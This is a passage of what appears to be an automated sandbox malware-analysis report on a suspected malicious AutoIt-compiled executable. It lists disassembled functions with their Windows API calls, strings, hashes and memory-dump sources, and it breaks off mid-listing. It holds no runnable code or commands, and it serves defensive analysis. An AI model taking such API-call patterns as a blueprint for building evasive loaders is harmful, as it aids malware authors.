                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: e18a6293967ccbcef805ccf35a0d956a6408e27318b15e71c82aa9a87c1f5866
                                    • Instruction ID: 5364134bc47b62218bc8a2d09d16125a7be818c3c5050e467245bd637529861e
                                    • Opcode Fuzzy Hash: e18a6293967ccbcef805ccf35a0d956a6408e27318b15e71c82aa9a87c1f5866
                                    • Instruction Fuzzy Hash: 1B518172D007199BDB24CF65C881BEABBF8FF04724F20856EEA4AC7241E775A584DB50
                                    Function 00F5DA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F5DAFB
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F5DB0C
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F5DB8E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 1548245697-1075368562
                                    • Opcode ID: 07ba258c2008f28e47188a88200755e6a6aed3d75629c9d8fa9df034cdccd76e
                                    • Instruction ID: 9f77dc9118cd6eac7940ed1103478daf90506e14b407f07adccb6aa2c3c695f3
                                    • Opcode Fuzzy Hash: 07ba258c2008f28e47188a88200755e6a6aed3d75629c9d8fa9df034cdccd76e
                                    • Instruction Fuzzy Hash: 3541C671601208EFDB24CF14C884BAA7BBAEF84311F1180A9EE059F255D7B0DD48EBA0
                                    Function 00F87BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F8F910,00000000,?,?,?,?), ref: 00F87C4E
                                    • GetWindowLongW.USER32 ref: 00F87C6B
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F87C7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 8098b476dfd9834c2efc770dc52f98a037f1613f978ffd2d53b60d0891fc430a
                                    • Instruction ID: e74516b0390fa53cdf0a1ff11b3a014c85ed3a405ee5350f40c2f8b1fd345794
                                    • Opcode Fuzzy Hash: 8098b476dfd9834c2efc770dc52f98a037f1613f978ffd2d53b60d0891fc430a
                                    • Instruction Fuzzy Hash: 4F31CD31A0420AAEDB11AF38CC45BEA77A9FF49334F204725F875932E0C735E855AB60
                                    Function 00F87648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F876D0
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F876E4
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F87708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 64293a6021b869591d058e3d46be264f4b81d86a973a28411f550295c0972228
                                    • Instruction ID: 7b1394318af71d4b5ada25b9e448373751d91c55e0935902f215e145fe93cf61
                                    • Opcode Fuzzy Hash: 64293a6021b869591d058e3d46be264f4b81d86a973a28411f550295c0972228
                                    • Instruction Fuzzy Hash: 2F21B132510218ABDF11EF64CC42FEA3B69EF48724F210214FE156B1D0DAB5E854ABA0
                                    Function 00F86F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F86FAA
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F86FBA
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F86FDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: df44f27f33a5954cc5a8d2c29f5757f42cbb2dcaa195ef7251716bd3e1474480
                                    • Instruction ID: fe53bdcf4552cb33566305854ce4d2f92423791fa466c5d3ff0452431dafb024
                                    • Opcode Fuzzy Hash: df44f27f33a5954cc5a8d2c29f5757f42cbb2dcaa195ef7251716bd3e1474480
                                    • Instruction Fuzzy Hash: C821B032A10118BFDF119F54EC85EEB37AAEF89760F118124FA049B190DA71EC51ABA0
                                    Function 00F8797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F879E1
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F879F6
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F87A03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: a99664ed1e0562372f5d4938f6c5e26afa724bf61be0a125f18e7ebd1738cc31
                                    • Instruction ID: 0e9d6fcbff282b1b40860b45b07a228d74827c5500373d1c10059b8c6f2769b3
                                    • Opcode Fuzzy Hash: a99664ed1e0562372f5d4938f6c5e26afa724bf61be0a125f18e7ebd1738cc31
                                    • Instruction Fuzzy Hash: A311E732654208BEEF14AF60CC45FEB77ADEF89764F110519F645A60A0D671D811EB60
                                    Function 00F7C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F41D88,?), ref: 00F7C312
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F7C324
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 353c70d9ba2736c4d882b9a7b919cfa8d4c8318a40a5a1e3b0b707e2d09c4131
                                    • Instruction ID: 2bb35ca50575ec697fc42e3b9e1a27b311995c03e439a27a4e2dcc4e148147d7
                                    • Opcode Fuzzy Hash: 353c70d9ba2736c4d882b9a7b919cfa8d4c8318a40a5a1e3b0b707e2d09c4131
                                    • Instruction Fuzzy Hash: DDE01275A00713CFDB605F25D818AD676D4EF08769F80C43EE899D2250E770D885EBA1
                                    Function 00F04C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04C2E), ref: 00F04CA3
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04CB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
                                    • Instruction ID: 1e6c4d9ce50e707abb9849aa8b3a01bdde2706af737c0df32da41294d2078929
                                    • Opcode Fuzzy Hash: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
                                    • Instruction Fuzzy Hash: 85D0C270900727CFD7205F30C90C68272D4AF00760F10C83A9881C2590D670D484E750
                                    Function 00F04D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04CE1,?), ref: 00F04DA2
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04DB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: ebdd71bcd7bc3273def4cb79ddd86d31f6b8b84868ac19295458fcfb710c8cf8
                                    • Instruction ID: ca4d572d3095ec60b5f3536df813066f4a18db81ac783d229845e671979003fd
                                    • Opcode Fuzzy Hash: ebdd71bcd7bc3273def4cb79ddd86d31f6b8b84868ac19295458fcfb710c8cf8
                                    • Instruction Fuzzy Hash: C0D0C770A00B13CFC720AF31C80CA8676E4AF043A8B00883AD8C2C2590E770E880EB90
                                    Function 00F04D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00F04D2E,?,00F04F4F,?,00FC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04D6F
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 21e8650ec5beacbf216ca6f66576f397e7e39efcb8a452a19dae8c0e0b902045
                                    • Instruction ID: f362a2672dc86b66cd89864d2df3c3d4c936784389a20ee3f65e313f7e7f7c18
                                    • Opcode Fuzzy Hash: 21e8650ec5beacbf216ca6f66576f397e7e39efcb8a452a19dae8c0e0b902045
                                    • Instruction Fuzzy Hash: 17D01770A10B17CFD720AF31D80D6A676E8AF157A6B11883FD486D6290E770E884EB51
                                    Function 00F81072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F812C1), ref: 00F81080
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F81092
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: da4cd5f100419c226e9f6b7258e0870466cc6128c0c7fe5ac96cc9aba2a7bd98
                                    • Instruction ID: 7bf57619ea20cdfcf2ba43f7d82a7dbd8bf06213ec3b37180b5bb320a5c5ea38
                                    • Opcode Fuzzy Hash: da4cd5f100419c226e9f6b7258e0870466cc6128c0c7fe5ac96cc9aba2a7bd98
                                    • Instruction Fuzzy Hash: 31D01730910B12CFD720AF36DC1DAAA76E8AF05761B118D3AA48ADA150E7B0C8C0EB51
                                    Function 00F793F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F79009,?,00F8F910), ref: 00F79403
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F79415
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 86192cbd312833984d20dda4ab23d1a29c52fe6603d07d6d827e051160ed778c
                                    • Instruction ID: 8b6a43299a24902ae661ae5db88bf689648c56afabb7a383734744c054a3bbff
                                    • Opcode Fuzzy Hash: 86192cbd312833984d20dda4ab23d1a29c52fe6603d07d6d827e051160ed778c
                                    • Instruction Fuzzy Hash: 40D0C730A44B17CFC7209F31E90D28276E4AF00361B00C83AA48AC2550E6B0C884EB12
                                    Function 00F41B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 88ed92509773e718aa685206a365ea5237619eaefb36786e2056344b51ad2f28
                                    • Instruction ID: 9e94b1bd479f61d0feb9b9f478e41f66f063651771219c7fa4848d815859e8cb
                                    • Opcode Fuzzy Hash: 88ed92509773e718aa685206a365ea5237619eaefb36786e2056344b51ad2f28
                                    • Instruction Fuzzy Hash: 1BD012B380411CEACB549B909C44AF97B7CF748301F1006D2BD0691440F2349BC4FB22
                                    Function 00F576C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
                                    • Instruction ID: 9c291046d36bf7362ab23e98ca5bb2491e08d2aa09166d94c04f97cc9a8b3a7e
                                    • Opcode Fuzzy Hash: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
                                    • Instruction Fuzzy Hash: B5C18E75E04216EFCB14DF94D884EAEBBB5FF48311B208598E905EB251D730ED85EBA0
                                    Function 00F7E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 00F7E3D2
                                    • CharLowerBuffW.USER32(?,?), ref: 00F7E415
                                      • Part of subcall function 00F7DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7DAD9
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F7E615
                                    • _memmove.LIBCMT ref: 00F7E628
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: b958c959a3ab1ed3cabaad03a55fda84ac841b11afc033862cbb309a70c84f69
                                    • Instruction ID: 83fff29f2b45a379d4948aa213ecc37e770c44631face01a7e9b9760b570d744
                                    • Opcode Fuzzy Hash: b958c959a3ab1ed3cabaad03a55fda84ac841b11afc033862cbb309a70c84f69
                                    • Instruction Fuzzy Hash: 89C15C71A083119FC714DF28C88095ABBE4FF88714F1489AEF899DB352D775E905DB82
                                    Function 00F56DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
